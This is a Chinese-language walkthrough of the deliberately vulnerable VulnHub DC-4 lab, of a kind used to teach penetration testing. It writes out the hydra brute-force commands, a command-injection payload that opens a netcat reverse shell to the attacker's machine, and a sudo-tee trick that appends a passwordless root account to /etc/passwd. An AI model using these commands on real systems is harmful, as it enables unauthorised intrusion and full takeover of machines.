-
前言
-
攻击过程
-
信息收集
-
开始攻击
-
权限提升
-
Ending......
前言
-
靶场链接:https://www.vulnhub.com/entry/dc-4,313/
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
攻击过程
信息收集
首先使用 arp-scan 扫描内网存活主机:
arp-scan --interface=eth0 192.168.226.0/24
发现主机 192.168.226.130,使用nmap进一步探测其端口情况:
nmap -sC -sV -p- -sT 192.168.226.130
开启了 22、80 和 111 三个端口。先访问 80 端口,是一个 Admin 登录系统:
测试了 sql 注入没啥用,由于没有验证码,所以我们考虑爆破。
开始攻击
我们使用 hydra 工具外加 kali 自带的字典进行登录爆破:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.226.130 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
如上图所示,成功爆破得到 admin 的密码为 happy。
登录后发现有三个选项可以执行不同的命令:
我们抓包即可实现任意命令执行:
然后使用 nc 反弹个 Shell:
radio=nc 192.168.226.128 2333 -e /bin/bash&submit=Run
成功。
然后再 /home 中发现了三个用户 charles、jim、sam 的主目录,并在 jim 中发现了一个 oldpasswords.bak 文件:
我们获取该文件并使用里面的密码对 jim 用户进行 ssh 登录爆破:
hydra -l jim -P old-passwords.txt -t 6 ssh://192.168.226.130
爆破成功,使用 jim 用户登录 ssh:
如上图所示,提示我有新邮件。我们在 jim 用户主目录发现一个邮件:
去 /var/mail 里面查看邮件日志:
发现 Charles 用户的密码,成功切换到 Charles 用户:
权限提升
首先考虑 Suid 提权,但是没找的可以利用的命令:
再考虑 sudo:
发现该用户可以不需要输入密码即可以 root 权限执行 teehee 命令,这个 teehee 命令应该类似于 tee,用于读取标准输入的数据,并将其内容输出成文件。
那我们的思路就来了,由于 teehee 命令可以写入文件内容并不覆盖文件原有内容,并且可以以 root 权限运行,那我们可以将一个无密码的用户 admin 写入到 /etc/passwd 文件中,并加入到 root 组中:
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
然后直接切换到 admin 用户就是 root 权限了:
最终在 /root 里面发现并读取到了 flag:
Ending......
本文始发于微信公众号(山警网络空间安全与电子数据取证):Vulnhub DC-4 WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论